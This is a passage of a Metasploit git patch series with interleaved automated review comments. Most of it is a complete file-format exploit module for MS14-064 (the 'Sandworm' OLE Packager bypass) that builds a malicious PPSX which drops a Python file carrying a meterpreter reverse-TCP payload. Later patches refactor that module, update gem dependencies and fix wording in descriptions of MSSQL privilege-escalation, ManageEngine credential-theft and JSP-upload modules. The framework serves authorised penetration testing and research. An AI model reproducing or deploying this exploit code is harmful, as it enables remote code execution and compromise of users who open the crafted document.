#[ 'OSVDB', 'TODO' ], + [ 'OSVDB', '114485' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt' ], [ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ] ], From f658efe1449816cde41833c259f5474bbc8d5cde Mon Sep 17 00:00:00 2001 From: Trevor Rosen Date: Wed, 12 Nov 2014 16:08:03 -0600 Subject: [PATCH 29/38] Add the ability to specify mode in Rex output file * Because sometimes you might want to append * Preserves original hardcoded 'wb' as default * http://pubs.opengroup.org/onlinepubs/009695399/functions/fopen.html --- lib/rex/ui/text/output/file.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
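Review bot: In the `@@ -41,6 +44,7 @@` hunk, `sock.read(100)` can come back `nil` on a closed connection (as `IO#read` does at EOF), so `packet.include?` raises `NoMethodError`, which the `rescue ::Rex::ConnectionError, ::Errno::EPIPE` below does not catch; and because the verdict is the absence of the error string, any short or empty reply is printed as vulnerable. Guarding the read and dropping the `== true` comparison fixes both: `packet = sock.read(100).to_s`, `return print_error("#{ip}:#{rport} no response from listener") if packet.empty?`, `packet.include?("(ERROR_STACK=(ERROR=") ? print_error("#{ip}:#{rport} is not vulnerable ") : print_good("#{ip}:#{rport} is vulnerable")`. The added TODO about `report_vuln` is reasonable, but it should only fire once the response is known to be non-empty. `run_host` opens above the hunk, so the `connect` call and the request packet are outside this view.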
diff --git a/lib/rex/ui/text/output/file.rb b/lib/rex/ui/text/output/file.rb
index c3b9523778..e55f832282 100644
--- a/lib/rex/ui/text/output/file.rb
+++ b/lib/rex/ui/text/output/file.rb
@@ -14,8 +14,8 @@ class Output::File < Rex::Ui::Text::Output
 attr_accessor :fd
- def initialize(path)
- self.fd = ::File.open(path, "wb")
+ def initialize(path, mode='wb')
+ self.fd = ::File.open(path, mode)
 end
 def supports_color?
From e25b6145f9ad0b3ccd5cf2fb3b589c6e3a52fa1f Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 13 Nov 2014 00:56:10 -0600
Subject: [PATCH 30/38] Add module for MS14-064 bypassing UAC through python for windows
---
 .../fileformat/ms14_064_packager_python.rb | 184 ++++++++++++++++++
 1 file changed, 184 insertions(+)
 create mode 100644 modules/exploits/windows/fileformat/ms14_064_packager_python.rb
diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb
new file mode 100644
index 0000000000..6d190d3ae8
--- /dev/null
+++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb
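Review bot: The new `mode` parameter on `Output::File#initialize` is undocumented and handed straight to `::File.open`, so a caller passing `'a'` instead of `'ab'` silently drops the binary flag the old hard-coded `'wb'` guaranteed. Add a short YARD header above the method: `# @param path [String] file to write` and `# @param mode [String] fopen-style mode for ::File.open; keep the b flag (default 'wb') so output is not newline-translated`. If append is the motivating use, naming `'ab'` as the example in that comment would steer callers correctly.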
@@ -0,0 +1,184 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::EXE + + def initialize(info={}) + super(update_info(info, + 'Name' => "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python", + 'Description' => %q{ + This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) + allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability + publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista + SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. + However, based on our testing, the most reliable setup is on Windows platforms running + Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such as + using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to a + failure in the CPackage::CreateTempFileName function. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Haifei Li', # Vulnerability discovery and exploit technique + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + ['CVE', '2014-6352'], + ['MSB', 'MS14-064'], + ['BID', '70690'], + ['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm'] + ], + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + 'Targets' => + [ + ['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}], + ], + 'Privileged' => false, + 'DefaultOptions' => + { + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'DisclosureDate' => "Nov 12 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']) + ], self.class) + end + + def exploit + print_status("Creating '#{datastore['FILENAME']}' file ...") + zip = zip_ppsx(payload_packager, trigger_packager) + file_create(zip) + end + + def zip_ppsx(ole_payload, ole_trigger) + zip_data = {} + data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template') + + Dir["#{data_dir}/**/**"].each do |file| + unless File.directory?(file) + zip_data[file.sub(data_dir,'')] = File.read(file) + end + end + + # add the otherwise skipped "hidden" file + file = "#{data_dir}/_rels/.rels" + zip_data[file.sub(data_dir,'')] = File.read(file) + + # put our own OLE streams + zip_data['/ppt/embeddings/oleObject1.bin'] = ole_payload + zip_data['/ppt/embeddings/oleObject2.bin'] = ole_trigger + + # create the ppsx + ppsx = Rex::Zip::Archive.new + zip_data.each_pair do |k,v| + ppsx.add_file(k,v) + end + + ppsx.pack + end + + def payload_packager + payload_name = 'tabnanny.py' + + file_info = [2].pack('v') + file_info << "#{payload_name}\x00" + file_info << "#{payload_name}\x00" + file_info << "\x00\x00" + + extract_info = [3].pack('v') + extract_info << [payload_name.length + 1].pack('V') + extract_info << "#{payload_name}\x00" + + 
p = payload.encoded + file = [p.length].pack('V') + file << p + + append_info = [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + append_info << [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + append_info << [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + + ole_data = file_info + extract_info + file + append_info + ole_contents = [ole_data.length].pack('V') + ole_data + + ole = create_ole("\x01OLE10Native", ole_contents) + + ole + end + + def trigger_packager + payload_name = "#{rand_text_alpha(4)}.py" + + file_info = [2].pack('v') + file_info << "#{payload_name}\x00" + file_info << "#{payload_name}\x00" + file_info << "\x00\x00" + + extract_info = [3].pack('v') + extract_info << [payload_name.length + 1].pack('V') + extract_info << "#{payload_name}\x00" + + random_text = rand_text_alpha(4 + rand(4)) + file = [random_text.length].pack('V') + file << random_text + + append_info = [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + append_info << [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + append_info << [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + + ole_data = file_info + extract_info + file + append_info + ole_contents = [ole_data.length].pack('V') + ole_data + + ole = create_ole("\x01OLE10Native", ole_contents) + + ole + end + + def create_ole(stream_name, data) + ole_tmp = Rex::Quickfile.new('ole') + stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE) + + stm = stg.create_stream(stream_name) + stm << data + stm.close + + directory = stg.instance_variable_get(:@directory) + directory.each_entry do |entry| + if entry.instance_variable_get(:@_ab) == 'Root Entry' + # 0003000C-0000-0000-c000-000000000046 # Packager + clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46") + 
entry.instance_variable_set(:@_clsId, clsid) + end + end + + # write to disk + stg.close + + ole_contents = File.read(ole_tmp.path) + ole_tmp.close + ole_tmp.unlink + + ole_contents + end + +end + From 38a96e3cfcf7496b7b4adc701a3e473f75ce8495 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 13 Nov 2014 00:56:42 -0600 Subject: [PATCH 31/38] Update target info --- modules/exploits/windows/fileformat/ms14_064_packager_python.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb index 6d190d3ae8..c85736b52e 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Arch' => ARCH_PYTHON, 'Targets' => [ - ['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}], + ['Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013', {}], ], 'Privileged' => false, 'DefaultOptions' => From 31f3aa1f6d3a63a004dc255c794d69e21561b71e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 13 Nov 2014 01:16:15 -0600 Subject: [PATCH 32/38] Refactor create packager methods --- .../fileformat/ms14_064_packager_python.rb | 62 +++++-------------- 1 file changed, 15 insertions(+), 47 deletions(-) diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb index c85736b52e..3b5bf12fb1 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb 
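Review bot: `create_ole` in this new file opens a `Rex::Quickfile` but only closes and unlinks it on the success path, so an exception from `Rex::OLE::Storage.new`, `create_stream` or `stg.close` leaves the temp file behind until a finalizer runs, if one does; move the `ole_tmp.close` / `ole_tmp.unlink` pair into an `ensure` clause around the storage work. The `instance_variable_get(:@directory)` / `instance_variable_set(:@_clsId, …)` calls reach into Rex::OLE internals, presumably because the storage API exposes no setter for the root entry CLSID; a comment stating that, e.g. `# Rex::OLE has no public way to set the root CLSID, so poke the directory entry directly`, tells the next maintainer why this is not a method call. The comment `# 0003000C-0000-0000-c000-000000000046 # Packager` would also be clearer as `# CLSID of the Packager OLE object, written little-endian below`.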
@@ -60,6 +60,8 @@ class Metasploit3 < Msf::Exploit::Remote
 def exploit
 print_status("Creating '#{datastore['FILENAME']}' file ...")
+ payload_packager = create_packager('tabnanny.py', payload.encoded)
+ trigger_packager = create_packager("#{rand_text_alpha(4)}.py", rand_text_alpha(4 + rand(10)))
 zip = zip_ppsx(payload_packager, trigger_packager)
 file_create(zip)
 end
@@ -91,59 +93,25 @@ class Metasploit3 < Msf::Exploit::Remote ppsx.pack end - def payload_packager - payload_name = 'tabnanny.py' - + def create_packager(file_name, contents) file_info = [2].pack('v') - file_info << "#{payload_name}\x00" - file_info << "#{payload_name}\x00" + file_info << "#{file_name}\x00" + file_info << "#{file_name}\x00" file_info << "\x00\x00" extract_info = [3].pack('v') - extract_info << [payload_name.length + 1].pack('V') - extract_info << "#{payload_name}\x00" + extract_info << [file_name.length + 1].pack('V') + extract_info << "#{file_name}\x00" - p = payload.encoded - file = [p.length].pack('V') - file << p + file = [contents.length].pack('V') + file << contents - append_info = [payload_name.length].pack('V') - append_info << Rex::Text.to_unicode(payload_name) - append_info << [payload_name.length].pack('V') - append_info << Rex::Text.to_unicode(payload_name) - append_info << [payload_name.length].pack('V') - append_info << Rex::Text.to_unicode(payload_name) - - ole_data = file_info + extract_info + file + append_info - ole_contents = [ole_data.length].pack('V') + ole_data - - ole = create_ole("\x01OLE10Native", ole_contents) - - ole - end - - def trigger_packager - payload_name = "#{rand_text_alpha(4)}.py" - - file_info = [2].pack('v') - file_info << "#{payload_name}\x00" - file_info << "#{payload_name}\x00" - file_info << "\x00\x00" - - extract_info = [3].pack('v') - extract_info << [payload_name.length + 1].pack('V') - extract_info << "#{payload_name}\x00" - - random_text = rand_text_alpha(4 + rand(4)) - file = [random_text.length].pack('V') - file << random_text - - append_info = [payload_name.length].pack('V') - append_info << Rex::Text.to_unicode(payload_name) - append_info << [payload_name.length].pack('V') - append_info << Rex::Text.to_unicode(payload_name) - append_info << [payload_name.length].pack('V') - append_info << Rex::Text.to_unicode(payload_name) + append_info = [file_name.length].pack('V') + append_info << 
Rex::Text.to_unicode(file_name) + append_info << [file_name.length].pack('V') + append_info << Rex::Text.to_unicode(file_name) + append_info << [file_name.length].pack('V') + append_info << Rex::Text.to_unicode(file_name) ole_data = file_info + extract_info + file + append_info ole_contents = [ole_data.length].pack('V') + ole_data From ccc5bbd745815efe3b0005288e3f3f5455f4d5ba Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 13 Nov 2014 10:58:03 -0600 Subject: [PATCH 33/38] this spec needs to use the username factory :metasploit-credential_public factory will randomly return either a Username or BlankUsername and thus is not appropriate for when you want tos et an explicit Username. The :metasploit_credential_username factory should be used for this instead MSP-11609 --- spec/lib/msf/ui/command_dispatcher/db_spec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/spec/lib/msf/ui/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/command_dispatcher/db_spec.rb index a200918f6c..df1ab1c627 100644 --- a/spec/lib/msf/ui/command_dispatcher/db_spec.rb +++ b/spec/lib/msf/ui/command_dispatcher/db_spec.rb @@ -25,7 +25,7 @@ describe Msf::Ui::Console::CommandDispatcher::Db do context "when a core already exists" do before(:each) do priv = FactoryGirl.create(:metasploit_credential_password, data: password) - pub = FactoryGirl.create(:metasploit_credential_public, username: username) + pub = FactoryGirl.create(:metasploit_credential_username, username: username) core = FactoryGirl.create(:metasploit_credential_core, origin: FactoryGirl.create(:metasploit_credential_origin_import), private: priv, From 49f10e6ed880cb943d1f954419c7f1abae766463 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 13 Nov 2014 11:26:05 -0600 Subject: [PATCH 34/38] use latest version of metasploit-credential MSP-11609 --- Gemfile | 1 + Gemfile.lock | 25 ++++++++++++++++--------- metasploit-framework-db.gemspec | 3 ++- 3 files changed, 19 insertions(+), 10 deletions(-) 
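Review bot: `create_packager` in the `@@ -91,59 +93,25 @@` hunk writes `contents.length` and `file_name.length` into the `pack('V')` length fields, i.e. character counts; for the binary `payload.encoded` and ASCII names this equals the byte count, but `bytesize` states the intent and stays correct if a multibyte string ever reaches it, e.g. `file = [contents.bytesize].pack('V')`. The method also lacks a header comment; one along the lines of "Builds the OLE10Native stream body for a packaged file: a `file_info` header carrying the name twice, an `extract_info` block with the length-prefixed name, the length-prefixed `contents`, then three copies of the name via `Rex::Text.to_unicode` in `append_info`" would make the layout readable without decoding the `pack` calls. The method's tail (the `create_ole` call and return) lies past the end of the hunk.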
diff --git a/Gemfile b/Gemfile index a53da0b5d0..653f766f60 100755 --- a/Gemfile +++ b/Gemfile @@ -5,6 +5,7 @@ gemspec name: 'metasploit-framework' group :db do gemspec name: 'metasploit-framework-db' + gem 'metasploit-credential', git: 'https://github.com/rapid7/metasploit-credential.git', branch: 'bug/MSP-11609/blank-username-failure' end group :development do diff --git a/Gemfile.lock b/Gemfile.lock index 8e20637455..eeebf69c23 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,3 +1,17 @@ +GIT + remote: https://github.com/rapid7/metasploit-credential.git + revision: b5c36d0df013969df64625cfe23bd9a0ab3d2ee6 + branch: bug/MSP-11609/blank-username-failure + specs: + metasploit-credential (0.13.3.pre.blank.pre.username.pre.failure) + metasploit-concern (~> 0.3.0) + metasploit-model (~> 0.28.0) + metasploit_data_models (~> 0.21.0) + pg + railties (< 4.0.0) + rubyntlm + rubyzip (~> 1.1) + PATH remote: . specs: @@ -22,7 +36,7 @@ PATH tzinfo metasploit-framework-db (4.10.1.pre.dev) activerecord (< 4.0.0) - metasploit-credential (~> 0.13.0) + metasploit-credential metasploit-framework (= 4.10.1.pre.dev) metasploit_data_models (~> 0.21.1) pg (>= 0.11) @@ -112,14 +126,6 @@ GEM metasploit-concern (0.3.0) activesupport (~> 3.0, >= 3.0.0) railties (< 4.0.0) - metasploit-credential (0.13.2) - metasploit-concern (~> 0.3.0) - metasploit-model (~> 0.28.0) - metasploit_data_models (~> 0.21.0) - pg - railties (< 4.0.0) - rubyntlm - rubyzip (~> 1.1) metasploit-model (0.28.0) activesupport railties (< 4.0.0) @@ -233,6 +239,7 @@ DEPENDENCIES factory_girl (>= 4.1.0) factory_girl_rails fivemat (= 1.2.1) + metasploit-credential! metasploit-framework! metasploit-framework-db! metasploit-framework-pcap! diff --git a/metasploit-framework-db.gemspec b/metasploit-framework-db.gemspec index 4583476747..7a9b6b99ee 100644 --- a/metasploit-framework-db.gemspec +++ b/metasploit-framework-db.gemspec 
@@ -31,7 +31,8 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'activerecord', rails_version_constraint # Metasploit::Credential database models - spec.add_runtime_dependency 'metasploit-credential', '~> 0.13.0' + #spec.add_runtime_dependency 'metasploit-credential', '~> 0.13.3' + spec.add_runtime_dependency 'metasploit-credential' # DELETE this before landing # Database models shared between framework and Pro. spec.add_runtime_dependency 'metasploit_data_models', '~> 0.21.1' # depend on metasploit-framewrok as the optional gems are useless with the actual code From 768d7477d7b34b96f71995fe7d2b33a2475ca05c Mon Sep 17 00:00:00 2001 From: Samuel Huckins Date: Thu, 13 Nov 2014 12:56:58 -0600 Subject: [PATCH 35/38] metasploit-credential bump to 0.13.3 MSP-11609 --- Gemfile | 1 - Gemfile.lock | 25 +++++++++---------------- metasploit-framework-db.gemspec | 3 +-- 3 files changed, 10 insertions(+), 19 deletions(-) diff --git a/Gemfile b/Gemfile index 653f766f60..a53da0b5d0 100755 --- a/Gemfile +++ b/Gemfile @@ -5,7 +5,6 @@ gemspec name: 'metasploit-framework' group :db do gemspec name: 'metasploit-framework-db' - gem 'metasploit-credential', git: 'https://github.com/rapid7/metasploit-credential.git', branch: 'bug/MSP-11609/blank-username-failure' end group :development do diff --git a/Gemfile.lock b/Gemfile.lock index eeebf69c23..12ae7c980e 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,17 +1,3 @@ -GIT - remote: https://github.com/rapid7/metasploit-credential.git - revision: b5c36d0df013969df64625cfe23bd9a0ab3d2ee6 - branch: bug/MSP-11609/blank-username-failure - specs: - metasploit-credential (0.13.3.pre.blank.pre.username.pre.failure) - metasploit-concern (~> 0.3.0) - metasploit-model (~> 0.28.0) - metasploit_data_models (~> 0.21.0) - pg - railties (< 4.0.0) - rubyntlm - rubyzip (~> 1.1) - PATH remote: . specs: 
@@ -36,7 +22,7 @@ PATH tzinfo metasploit-framework-db (4.10.1.pre.dev) activerecord (< 4.0.0) - metasploit-credential + metasploit-credential (~> 0.13.3) metasploit-framework (= 4.10.1.pre.dev) metasploit_data_models (~> 0.21.1) pg (>= 0.11) @@ -126,6 +112,14 @@ GEM metasploit-concern (0.3.0) activesupport (~> 3.0, >= 3.0.0) railties (< 4.0.0) + metasploit-credential (0.13.3) + metasploit-concern (~> 0.3.0) + metasploit-model (~> 0.28.0) + metasploit_data_models (~> 0.21.0) + pg + railties (< 4.0.0) + rubyntlm + rubyzip (~> 1.1) metasploit-model (0.28.0) activesupport railties (< 4.0.0) @@ -239,7 +233,6 @@ DEPENDENCIES factory_girl (>= 4.1.0) factory_girl_rails fivemat (= 1.2.1) - metasploit-credential! metasploit-framework! metasploit-framework-db! metasploit-framework-pcap! diff --git a/metasploit-framework-db.gemspec b/metasploit-framework-db.gemspec index 7a9b6b99ee..a91c98e6af 100644 --- a/metasploit-framework-db.gemspec +++ b/metasploit-framework-db.gemspec @@ -31,8 +31,7 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'activerecord', rails_version_constraint # Metasploit::Credential database models - #spec.add_runtime_dependency 'metasploit-credential', '~> 0.13.3' - spec.add_runtime_dependency 'metasploit-credential' # DELETE this before landing + spec.add_runtime_dependency 'metasploit-credential', '~> 0.13.3' # Database models shared between framework and Pro. spec.add_runtime_dependency 'metasploit_data_models', '~> 0.21.1' # depend on metasploit-framewrok as the optional gems are useless with the actual code From 0959ef3d13279f88f0e6171aa068b25026c84a14 Mon Sep 17 00:00:00 2001 
From: Trevor Rosen
Date: Thu, 13 Nov 2014 13:01:55 -0600
Subject: [PATCH 36/38] Fixes lack of support for MetasploitV5 tag #4184 * Appears to have been overlooked somehow in the pre-BlackHat crunch * V5 will not support credentials * We are implementing full-workspace zip import/export for credentials
---
 lib/msf/core/db_manager/import.rb | 3 +++
 1 file changed, 3 insertions(+)
diff --git a/lib/msf/core/db_manager/import.rb b/lib/msf/core/db_manager/import.rb
index e183dda908..0a03a656a9 100644
--- a/lib/msf/core/db_manager/import.rb
+++ b/lib/msf/core/db_manager/import.rb
@@ -302,6 +302,9 @@ module Msf::DBManager::Import
 when /MetasploitV4/
 @import_filedata[:type] = "Metasploit XML"
 return :msf_xml
+ when /MetasploitV5/
+ @import_filedata[:type] = "Metasploit XML"
+ return :msf_xml
 when /netsparker/
 @import_filedata[:type] = "NetSparker XML"
 return :netsparker_xml
From dd1920edd6bc8e79bd4c252a3a0ae75372a806fc Mon Sep 17 00:00:00 2001
From: Tod Beardsley
Date: Thu, 13 Nov 2014 14:48:23 -0600
Subject: [PATCH 37/38] Minor typos and grammar fixes
---
 modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +-
 modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb | 6 +++---
 modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb | 2 +-
 .../auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb | 2 +-
 modules/auxiliary/gather/eventlog_cred_disclosure.rb | 4 ++--
 .../exploits/multi/http/visual_mining_netcharts_upload.rb | 2 +-
 .../exploits/windows/fileformat/ms14_064_packager_python.rb | 4 ++--
 .../windows/fileformat/ms14_064_packager_run_as_admin.rb | 4 ++--
 8 files changed, 13 insertions(+), 13 deletions(-)
diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb
index c0349c53c0..a9e33a2dfc 100644
--- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb
+++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb
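Review bot: The added `when /MetasploitV5/` arm in the `@@ -302,6 +302,9 @@` hunk repeats the `MetasploitV4` body verbatim; a Ruby `when` accepts several patterns, so `when /MetasploitV4/, /MetasploitV5/` keeps a single copy of the two lines and makes the shared handling obvious. If V5 files are expected to diverge later (the commit message mentions credentials moving to a separate zip import), a comment on the arm such as `# V5 is parsed by the same XML importer; credentials are not carried in it` would record that decision. The enclosing `case` and its method start and end outside the hunk.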
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate privileges and obtain Super Administrator access. A Super Administrator can then - use its privileges to dump the whole password database in CSV format. PMP can use + use his privileges to dump the whole password database in CSV format. PMP can use both MySQL and PostgreSQL databases but this module only exploits the latter as MySQL does not support stacked queries with Java. PostgreSQL is the default database in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL, diff --git a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb index 080945eac1..5500d48a11 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb @@ -18,10 +18,10 @@ class Metasploit3 < Msf::Auxiliary Selecting all of the logins from the master..syslogins table is restricted to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is - pretty simple, because the principal ids assigned to logins are incremental. Once logins + pretty simple, because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. This is - important, because not all of the principal ids resolve to SQL logins. Some resolve to - roles etc. Once logins have been enumerated they can be used in dictionary attacks. + important, because not all of the principal IDs resolve to SQL logins (some resolve to + roles instead) Once logins have been enumerated, they can be used in dictionary attacks. }, 'Author' => ['nullbind '], 'License' => MSF_LICENSE, 
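Review bot: The rewritten line in the `@@ -17,7 +17,7 @@` hunk of manageengine_pmp_privesc.rb changes `its privileges` to `his privileges`; the subject is the `Super Administrator` role, so the neutral `their privileges` (or the original `its`) reads better than a gendered pronoun. One-word change: `use their privileges to dump the whole password database in CSV format. PMP can use`. The `%q{` description opens above the hunk.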
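Review bot: The second rewritten line in the `@@ -18,10 +18,10 @@` hunk of mssql_enum_sql_logins.rb drops the sentence break after the parenthesis, leaving `roles instead) Once logins have been enumerated`; it should read `roles instead). Once logins have been enumerated, they can be used in dictionary attacks.` The `%q{` description opens above the hunk.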
diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb index 7b13036a27..2a8a11b1ca 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Microsoft SQL Server - Escalate EXECUTE AS', 'Description' => %q{ This module can be used escalate privileges if the IMPERSONATION privilege has been - assigned to the user. In most cases this results in additional data access, but in + assigned to the user. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges. }, 'Author' => ['nullbind '], diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb index db05beb574..e2f781eb4f 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Microsoft SQL Server - SQLi Escalate Execute As', 'Description' => %q{ This module can be used escalate privileges if the IMPERSONATION privilege has been - assigned to the user via error based SQL injection. In most cases this results in + assigned to the user via error based SQL injection. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges. The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];-- }, diff --git a/modules/auxiliary/gather/eventlog_cred_disclosure.rb b/modules/auxiliary/gather/eventlog_cred_disclosure.rb index 217cd949c0..465db22b7b 100644 --- a/modules/auxiliary/gather/eventlog_cred_disclosure.rb +++ b/modules/auxiliary/gather/eventlog_cred_disclosure.rb 
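Review bot: In both `@@ -15,7 +15,7 @@` (mssql_escalate_execute_as.rb) and `@@ -16,7 +16,7 @@` (mssql_escalate_execute_as_sqli.rb) the context line directly above the edited one still reads `This module can be used escalate privileges`, missing `to`; since this commit is a grammar pass over these descriptions, `This module can be used to escalate privileges if the IMPERSONATION privilege has been` belongs in the same change. In the second module, `via error based SQL injection` would also read better hyphenated as `error-based`. Both `%q{` descriptions open above their hunks.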
@@ -19,8 +19,8 @@ class Metasploit3 < Msf::Auxiliary
 allow an unauthenticated user to obtain the superuser password of any managed Windows and AS/400 hosts. This module abuses both vulnerabilities to collect all the available usernames and passwords. First the agentHandler servlet is abused to get the hostid and
- slid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames
- and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7
+ slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames
+ and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,
 the TARGETURI has to be prepended with /event.
 },
 'Author' =>
diff --git a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb
index a2f131a062..9c4c7972c0 100644
--- a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb
+++ b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
 First, a lack of input validation in the administration console permits arbitrary jsp code upload to locations accessible later through the web service. Authentication is typically required, however a 'hidden' user is
- available by default (and non editable). This user, named 'Scheduler',
+ available by default (and non-editable). This user, named 'Scheduler',
 can only login to the console after any modification in the user database (a user is added, admin password is changed etc). If the 'Scheduler' user isn't available valid credentials must be supplied. The
diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb
index 3b5bf12fb1..28d2b86bf8 100644
--- a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb
+++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb
@@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote
 publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. However, based on our testing, the most reliable setup is on Windows platforms running
- Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such as
- using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to a
+ Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as
+ those using Office 2010 SP1 may be less stable, and may end up with a crash due to a
 failure in the CPackage::CreateTempFileName function.
 },
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb
index 3ae471c636..fdacc4d83b 100644
--- a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb
+++ b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb
@@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote
 The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. However, based on our testing, the most reliable setup is on Windows
